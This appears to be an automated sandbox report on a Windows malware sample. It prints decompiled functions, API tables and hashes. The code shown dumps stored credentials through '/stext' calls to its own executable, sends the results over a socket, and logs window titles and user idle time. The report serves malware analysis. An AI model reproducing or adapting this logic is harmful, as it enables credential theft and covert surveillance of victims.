				char _v5;
				char _v6;
				char _v7;
				char _v12;
				char _v36;
				char _v60;
				char _v84;
				char _v108;
				char _v132;
				char _v156;
				char _v180;
				char _v204;
				char _v228;
				char _v252;
				char _v276;
				char _v300;
				char _v324;
				char _v348;
				char _v372;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				short _v988;
				void* __ebx;
				void* __edi;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_v12 = 0;
				GetModuleFileNameW(0,  &_v988, 0x104);
				_v5 = 0;
				_v6 = 0;
				E004020C7(0,  &_v300);
				E004020C7(0,  &_v276);
				E004020C7(0,  &_v252);
				E004189FF( &_v228, 0x30, E00401F87(E00417A83( &_v36)));
				E00401FB9();
				E004189FF( &_v204, 0x30, E00401F87(E00417A83( &_v36)));
				E00401FB9();
				E004189FF( &_v180, 0x30, E00401F87(E00417A83( &_v36)));
				E00401FB9();
				E00401F87( &_a52);
				_t393 = L" /stext \"";
				_t224 = E00414D29(E00401EDD(E00403098(0,  &_v396, E0040440A(0,  &_v420, E004043E6(0,  &_v444,  &_v988, _t405, E00404260(0,  &_v468, L" /stext \"")), _t405,  &_v228), L" /stext \"", _t405, "\"")));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401F87( &_a76);
				_t225 = E00414D29(E00401EDD(E00403098(_t224,  &_v324, E0040440A(_t137,  &_v348, E004043E6(_t137,  &_v372,  &_v988, _t405, E00404260(_t137,  &_v60, _t393)), _t405,  &_v204), _t393, _t405, "\"")));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401F87( &_a100);
				_v7 = E00414D29(E00401EDD(E00403098(_t225,  &_v84, E0040440A(_t225,  &_v108, E004043E6(_t225,  &_v132,  &_v988, _t405, E00404260(_t225,  &_v156, _t393)), _t405,  &_v180), _t393, _t405, "\"")));
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v7 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				L5:
				L5:
				if(E004183CC(E00401EDD( &_v228),  &_v300) != 0) {
					_v12 = 1;
					DeleteFileW(E00401EDD( &_v228));
				}
				if(E004183CC(E00401EDD( &_v204),  &_v276) != 0) {
					_v5 = 1;
					DeleteFileW(E00401EDD( &_v204));
				}
				if(E004183CC(E00401EDD( &_v180),  &_v252) != 0) {
					_v6 = 1;
					DeleteFileW(E00401EDD( &_v180));
				}
				if(_v12 == 0 || _v5 == 0 || _v6 == 0) {
					goto L14;
				}
				L15:
				_t173 = E00405C1B("0");
				_t418 = _t173;
				if(_t173 == 0) {
					E00402F85(_t226, _t402 - 0x18, E00402F85(_t226,  &_v156, E00402F85(_t226,  &_v132, E00402F85(_t226,  &_v108, E00402F85(_t226,  &_v84, E00402FA9( &_v60,  &_a28, 0x46e250), __eflags,  &_v300), __eflags, 0x46e250), __eflags,  &_v276), __eflags, 0x46e250), __eflags,  &_v252);
					_push(0x6a);
					E00404BB7(_t226, 0x46e6e8, _t180, __eflags);
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
				} else {
					_t199 = E00417C16(_t226,  &_v324, _t399);
					E00402F0F(_t402 - 0x18, E00402F85(_t226,  &_v156, E00402F85(_t226,  &_v132, E00402F85(_t226,  &_v108, E00402F85(_t226,  &_v84, E00402F85(_t226,  &_v60, E00402F85(_t226,  &_v372, E00402FA9( &_v348,  &_a28, 0x46e250), _t418,  &_v300), _t418, 0x46e250), _t418,  &_v276), _t418, 0x46e250), _t418,  &_v252), _t418, 0x46e250), _t199);
					_push(0x69);
					E00404BB7(_t226, 0x46e6e8, _t207, _t418);
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
				}
				E00401FB9();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				E00401FB9();
				return E00401FB9();
				L14:
				Sleep(0x1f4);
				_t394 = _t394 + 1;
				if(_t394 < 0xa) {
					goto L5;
				}
				goto L15;
			}





































                                                                                                0x00410334
                                                                                                0x0041034f
                                                                                                0x00410352
                                                                                                0x0041035e
                                                                                                0x00410361
                                                                                                0x00410364
                                                                                                0x0041036f
                                                                                                0x0041037a
                                                                                                0x00410397
                                                                                                0x004103a0
                                                                                                0x004103bd
                                                                                                0x004103c6
                                                                                                0x004103e3
                                                                                                0x004103ec
                                                                                                0x004103f4
                                                                                                0x0041040c
                                                                                                0x00410457
                                                                                                0x0041045f
                                                                                                0x0041046a
                                                                                                0x00410475
                                                                                                0x00410480
                                                                                                0x00410488
                                                                                                0x004104e9
                                                                                                0x004104eb
                                                                                                0x004104f6
                                                                                                0x00410501
                                                                                                0x00410509
                                                                                                0x00410511
                                                                                                0x00410569
                                                                                                0x0041056c
                                                                                                0x00410574
                                                                                                0x0041057c
                                                                                                0x00410587
                                                                                                0x00410595
                                                                                                0x0041059a
                                                                                                0x0041059c
                                                                                                0x0041059c
                                                                                                0x004105a0
                                                                                                0x004105a2
                                                                                                0x004105a2
                                                                                                0x004105a3
                                                                                                0x004105a9
                                                                                                0x00000000
                                                                                                0x004105ab
                                                                                                0x004105c5
                                                                                                0x004105cd
                                                                                                0x004105d7
                                                                                                0x004105d7
                                                                                                0x004105f3
                                                                                                0x004105fb
                                                                                                0x00410605
                                                                                                0x00410605
                                                                                                0x00410621
                                                                                                0x00410629
                                                                                                0x00410633
                                                                                                0x00410633
                                                                                                0x00410639
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041065c
                                                                                                0x00410664
                                                                                                0x00410669
                                                                                                0x0041066b
                                                                                                0x004107bc
                                                                                                0x004107c2
                                                                                                0x004107c9
                                                                                                0x004107d4
                                                                                                0x004107dc
                                                                                                0x004107e4
                                                                                                0x004107ec
                                                                                                0x00410671
                                                                                                0x00410679
                                                                                                0x004106fd
                                                                                                0x00410703
                                                                                                0x0041070a
                                                                                                0x00410715
                                                                                                0x0041071d
                                                                                                0x00410725
                                                                                                0x0041072d
                                                                                                0x00410735
                                                                                                0x00410740
                                                                                                0x0041074b
                                                                                                0x00410750
                                                                                                0x004107f4
                                                                                                0x004107ff
                                                                                                0x0041080a
                                                                                                0x00410815
                                                                                                0x00410820
                                                                                                0x0041082b
                                                                                                0x00410836
                                                                                                0x0041083e
                                                                                                0x00410846
                                                                                                0x0041084e
                                                                                                0x00410856
                                                                                                0x00410869
                                                                                                0x00410647
                                                                                                0x0041064c
                                                                                                0x00410652
                                                                                                0x00410656
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410352
                                                                                                  • Part of subcall function 00417A83: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040415E), ref: 00417AAA
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004041D7,?,004041D7,004604D4), ref: 00414D3F
                                                                                                  • Part of subcall function 00414D29: CloseHandle.KERNEL32(004604D4,?,004041D7,004604D4), ref: 00414D48
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 004105D7
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 00410605
                                                                                                • DeleteFileW.KERNEL32(00000000,004604D4,004604D4,004604D4), ref: 00410633
                                                                                                • Sleep.KERNEL32(000001F4,004604D4,004604D4,004604D4), ref: 0041064C
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
                                                                                                • String ID: /stext "$PF$PF$F$F
                                                                                                • API String ID: 1351907930-1667803458
                                                                                                • Opcode ID: c790b0065922cbb01fccee7cd7bbbd9f635edb1bfe0eee90782f4a45a1587345
                                                                                                • Instruction ID: dfc6d6d7a8e1c1e06e788e5705e46e24d2358ea2877a2c2a7d8cc917f82f92d4
                                                                                                • Opcode Fuzzy Hash: c790b0065922cbb01fccee7cd7bbbd9f635edb1bfe0eee90782f4a45a1587345
                                                                                                • Instruction Fuzzy Hash: A1D141719001199BCB18FBA1DC91AEDB375AF54308F5041BFE50A771E2EF789E89CA48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044E510, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E0044E510(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46c00c; // 0x4cc22724
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E004414B9(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E004414B9(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t14 =  &_v44; // 0x44e7e9
							_t70 =  *( *((intOrPtr*)( *_t14)) + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E00440C6C(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E004519B0();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t40 =  &_v44; // 0x44e7e9
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73,  *_t40) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00440C6C(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E004519B0();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00443382(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E004318FD(_t130);
													}
												}
											}
										}
									}
								}
								E004318FD(_t100);
							}
						}
					}
				}
				L63:
				return E00430A5B(_v8 ^ _t132);
			}






































                                                                                                0x0044e518
                                                                                                0x0044e51f
                                                                                                0x0044e527
                                                                                                0x0044e52a
                                                                                                0x0044e530
                                                                                                0x0044e533
                                                                                                0x0044e536
                                                                                                0x0044e53a
                                                                                                0x0044e53d
                                                                                                0x0044e542
                                                                                                0x0044e569
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044e544
                                                                                                0x0044e54c
                                                                                                0x0044e54e
                                                                                                0x0044e552
                                                                                                0x0044e552
                                                                                                0x0044e557
                                                                                                0x0044e575
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044e559
                                                                                                0x0044e562
                                                                                                0x0044e577
                                                                                                0x0044e577
                                                                                                0x0044e57c
                                                                                                0x0044e57e
                                                                                                0x0044e583
                                                                                                0x0044e586
                                                                                                0x0044e586
                                                                                                0x0044e58b
                                                                                                0x0044e597
                                                                                                0x0044e5a4
                                                                                                0x0044e5b1
                                                                                                0x0044e5c4
                                                                                                0x00000000
                                                                                                0x0044e5c6
                                                                                                0x0044e5c8
                                                                                                0x0044e5fb
                                                                                                0x00000000
                                                                                                0x0044e5fd
                                                                                                0x0044e5ff
                                                                                                0x0044e603
                                                                                                0x0044e609
                                                                                                0x0044e60c
                                                                                                0x0044e60e
                                                                                                0x0044e611
                                                                                                0x0044e611
                                                                                                0x0044e616
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044e618
                                                                                                0x0044e61c
                                                                                                0x0044e626
                                                                                                0x0044e62b
                                                                                                0x00000000
                                                                                                0x0044e62d
                                                                                                0x00000000
                                                                                                0x0044e62d
                                                                                                0x0044e62b
                                                                                                0x00000000
                                                                                                0x0044e61c
                                                                                                0x0044e611
                                                                                                0x0044e60c
                                                                                                0x00000000
                                                                                                0x0044e603
                                                                                                0x0044e5ca
                                                                                                0x0044e5cc
                                                                                                0x0044e5d0
                                                                                                0x0044e5d6
                                                                                                0x0044e5d9
                                                                                                0x0044e5db
                                                                                                0x0044e5db
                                                                                                0x0044e5e0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044e5e2
                                                                                                0x0044e5e6
                                                                                                0x0044e5f0
                                                                                                0x0044e5f5
                                                                                                0x00000000
                                                                                                0x0044e5f7
                                                                                                0x00000000
                                                                                                0x0044e5f7
                                                                                                0x0044e5f5
                                                                                                0x00000000
                                                                                                0x0044e5e6
                                                                                                0x0044e5db
                                                                                                0x0044e5d9
                                                                                                0x00000000
                                                                                                0x0044e5d0
                                                                                                0x0044e5c8
                                                                                                0x0044e5b3
                                                                                                0x0044e5b3
                                                                                                0x0044e5b3
                                                                                                0x00000000
                                                                                                0x0044e5b3
                                                                                                0x0044e5a6
                                                                                                0x0044e5a6
                                                                                                0x0044e5a8
                                                                                                0x0044e599
                                                                                                0x0044e599
                                                                                                0x0044e59b
                                                                                                0x0044e59b
                                                                                                0x0044e632
                                                                                                0x0044e632
                                                                                                0x0044e632
                                                                                                0x0044e63f
                                                                                                0x0044e645
                                                                                                0x0044e64a
                                                                                                0x0044e56b
                                                                                                0x0044e650
                                                                                                0x0044e650
                                                                                                0x0044e658
                                                                                                0x0044e65c
                                                                                                0x0044e6b7
                                                                                                0x0044e6b9
                                                                                                0x00000000
                                                                                                0x0044e65e
                                                                                                0x0044e663
                                                                                                0x0044e665
                                                                                                0x0044e667
                                                                                                0x0044e66f
                                                                                                0x0044e693
                                                                                                0x0044e698
                                                                                                0x0044e69d
                                                                                                0x0044e6a3
                                                                                                0x00000000
                                                                                                0x0044e6a9
                                                                                                0x0044e6a9
                                                                                                0x00000000
                                                                                                0x0044e6a9
                                                                                                0x0044e671
                                                                                                0x0044e673
                                                                                                0x0044e677
                                                                                                0x0044e67c
                                                                                                0x0044e67e
                                                                                                0x0044e683
                                                                                                0x0044e798
                                                                                                0x0044e798
                                                                                                0x0044e689
                                                                                                0x0044e689
                                                                                                0x0044e6af
                                                                                                0x0044e6af
                                                                                                0x0044e6b2
                                                                                                0x0044e6bc
                                                                                                0x0044e6be
                                                                                                0x00000000
                                                                                                0x0044e6c4
                                                                                                0x0044e6c4
                                                                                                0x0044e6cc
                                                                                                0x0044e6da
                                                                                                0x00000000
                                                                                                0x0044e6e0
                                                                                                0x0044e6e9
                                                                                                0x0044e6ef
                                                                                                0x0044e6f4
                                                                                                0x00000000
                                                                                                0x0044e6fa
                                                                                                0x0044e6fa
                                                                                                0x0044e6fd
                                                                                                0x0044e702
                                                                                                0x0044e706
                                                                                                0x0044e752
                                                                                                0x00000000
                                                                                                0x0044e708
                                                                                                0x0044e70d
                                                                                                0x0044e70f
                                                                                                0x0044e711
                                                                                                0x0044e719
                                                                                                0x0044e736
                                                                                                0x0044e740
                                                                                                0x0044e742
                                                                                                0x0044e745
                                                                                                0x00000000
                                                                                                0x0044e747
                                                                                                0x0044e747
                                                                                                0x00000000
                                                                                                0x0044e747
                                                                                                0x0044e71b
                                                                                                0x0044e71d
                                                                                                0x0044e721
                                                                                                0x0044e726
                                                                                                0x0044e72a
                                                                                                0x0044e78c
                                                                                                0x0044e78c
                                                                                                0x0044e72c
                                                                                                0x0044e72c
                                                                                                0x0044e74d
                                                                                                0x0044e74d
                                                                                                0x0044e754
                                                                                                0x0044e756
                                                                                                0x00000000
                                                                                                0x0044e76f
                                                                                                0x0044e76f
                                                                                                0x0044e788
                                                                                                0x0044e788
                                                                                                0x0044e756
                                                                                                0x0044e72a
                                                                                                0x0044e719
                                                                                                0x0044e790
                                                                                                0x0044e795
                                                                                                0x0044e6f4
                                                                                                0x0044e6da
                                                                                                0x0044e6be
                                                                                                0x0044e683
                                                                                                0x0044e66f
                                                                                                0x0044e79c
                                                                                                0x0044e7a2
                                                                                                0x0044e64a
                                                                                                0x0044e58b
                                                                                                0x0044e557
                                                                                                0x0044e7a4
                                                                                                0x0044e7b7

                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E5BC
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E63F
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044E677
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,D,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E6D2
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044E721
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E6E9
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0044E7E9,00000000,00000000,?,00000001,?,?,?,?), ref: 0044E765
                                                                                                • __freea.LIBCMT ref: 0044E790
                                                                                                • __freea.LIBCMT ref: 0044E79C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID: D
                                                                                                • API String ID: 201697637-193714618
                                                                                                • Opcode ID: 8a28940df9b7658ffb5a64ce00da38eb783564ab905039fe25f974b679583ca0
                                                                                                • Instruction ID: 91fd6c9c5b5ea74ab1161302763bb0474b3c65c8354b7168618d08022f45a557
                                                                                                • Opcode Fuzzy Hash: 8a28940df9b7658ffb5a64ce00da38eb783564ab905039fe25f974b679583ca0
                                                                                                • Instruction Fuzzy Hash: 3B91D671E00215AEFF208EA6C881EEF7BB5BF09314F14455AE904E7281E73DDC418B69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004091BA, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E004091BA(void* __ecx, void* __edx) {
				char _v28;
				char _v56;
				char _v76;
				char _v80;
				char _v100;
				void* _v104;
				char _v108;
				char _v112;
				struct HWND__* _v116;
				void* __ebx;
				void* __edi;
				int _t36;
				struct HWND__* _t42;
				void* _t50;
				int _t57;
				struct HWND__* _t77;
				void* _t119;
				signed int _t125;
				void* _t127;

				_t112 = __edx;
				_t127 = (_t125 & 0xfffffff8) - 0x74;
				_push(_t77);
				_push(0xea60);
				_t119 = __ecx;
				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
					Sleep(0x1f4);
					_t77 = GetForegroundWindow();
					_t36 = GetWindowTextLengthW(_t77);
					_t4 = _t36 + 1; // 0x1
					E00409E21(_t77,  &_v100, _t112, _t119, _t4, 0);
					if(_t36 != 0) {
						_t57 = E0040247B();
						GetWindowTextW(_t77, E00401EDD( &_v100), _t57);
						_t112 = 0x46fe9c;
						if(E00409EE1(0x46fe9c) == 0) {
							E00409E07(0x46fe9c,  &_v100);
							E004074A2(E0040247B() - 1);
							_t127 = _t127 - 0x18;
							_t136 =  *0x46e3fb;
							if( *0x46e3fb == 0) {
								_t112 = E00409E9E( &_v76, L"\r\n[", __eflags,  &_v108);
								E00403098(_t77, _t127, _t67, _t119, __eflags, L"]\r\n");
								E00408BB6(_t119);
								E00401EE2();
							} else {
								E004074B3(_t77, _t127, 0x46fe9c, _t136,  &_v108);
								E0040964B(_t77, _t119, _t136);
							}
						}
					}
					_t83 = _t119;
					E00409C4A(_t119);
					if(E00417BC6(_t119) < 0xea60) {
						L18:
						E00401EE2();
						continue;
					} else {
						_t77 = _v116;
						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
							_t42 = E00417BC6(_t83);
							if(_t42 < 0xea60) {
								__eflags = _t77 % 0xea60;
								E0043CDA6(_t83, _t77 / 0xea60,  &_v112, 0xa);
								_t50 = E004076BB(_t77,  &_v80, E004053F2(_t77,  &_v56, "\r\n{ User has been idle for ", _t119, __eflags, E00402076(_t77,  &_v28,  &_v112)), _t119, __eflags, " minutes }\r\n");
								_t127 = _t127 + 0xc - 0x14;
								_t112 = _t50;
								E00417CCA(_t127, _t50);
								E00408BB6(_t119);
								E00401FB9();
								E00401FB9();
								E00401FB9();
								goto L18;
							}
							_t77 = _t42;
							_v116 = _t77;
							Sleep(0x3e8);
						}
						E00401EE2();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}






















                                                                                                0x004091ba
                                                                                                0x004091c0
                                                                                                0x004091c3
                                                                                                0x004091c4
                                                                                                0x004091c6
                                                                                                0x004091c8
                                                                                                0x00409227
                                                                                                0x00409233
                                                                                                0x00409236
                                                                                                0x00409240
                                                                                                0x00409248
                                                                                                0x0040924f
                                                                                                0x00409259
                                                                                                0x0040926a
                                                                                                0x00409270
                                                                                                0x00409280
                                                                                                0x0040928c
                                                                                                0x004092a0
                                                                                                0x004092a5
                                                                                                0x004092ac
                                                                                                0x004092b3
                                                                                                0x004092dd
                                                                                                0x004092e1
                                                                                                0x004092e9
                                                                                                0x004092f2
                                                                                                0x004092b5
                                                                                                0x004092b8
                                                                                                0x004092bf
                                                                                                0x004092bf
                                                                                                0x004092b3
                                                                                                0x00409280
                                                                                                0x004092f7
                                                                                                0x004092f9
                                                                                                0x0040930a
                                                                                                0x004093b2
                                                                                                0x004093b6
                                                                                                0x00000000
                                                                                                0x00409310
                                                                                                0x00409310
                                                                                                0x00409314
                                                                                                0x00409324
                                                                                                0x0040932b
                                                                                                0x0040934b
                                                                                                0x0040934e
                                                                                                0x0040937f
                                                                                                0x00409384
                                                                                                0x00409387
                                                                                                0x0040938b
                                                                                                0x00409392
                                                                                                0x0040939b
                                                                                                0x004093a4
                                                                                                0x004093ad
                                                                                                0x00000000
                                                                                                0x004093ad
                                                                                                0x0040932d
                                                                                                0x00409334
                                                                                                0x00409338
                                                                                                0x00409338
                                                                                                0x004093c4
                                                                                                0x00000000
                                                                                                0x004093c4
                                                                                                0x0040930a
                                                                                                0x004093cb
                                                                                                0x004093d1

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040921C
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409227
                                                                                                • GetForegroundWindow.USER32 ref: 0040922D
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00409236
                                                                                                • GetWindowTextW.USER32 ref: 0040926A
                                                                                                • Sleep.KERNEL32(000003E8), ref: 00409338
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                  • Part of subcall function 00408BB6: SetEvent.KERNEL32(?,?,?,?,00409D31,?,?,?,?,?,00000000), ref: 00408BE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLengthchar_traits
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 107669343-3954389425
                                                                                                • Opcode ID: 5d45b11ecc8e9c23778f9f7fef8c73985cf12f3dee1bdaf9cf281a776685ddf6
                                                                                                • Instruction ID: cca114199e163c592f4f49c004b9388a44b1f7875ebe9eee3f2e86a475b88c5a
                                                                                                • Opcode Fuzzy Hash: 5d45b11ecc8e9c23778f9f7fef8c73985cf12f3dee1bdaf9cf281a776685ddf6
                                                                                                • Instruction Fuzzy Hash: AB51E5716083015BC314FB65D895A6F77A5AB84308F40093FF486A62E3EF7C9E44C69E
                                                                                                Uniqueness

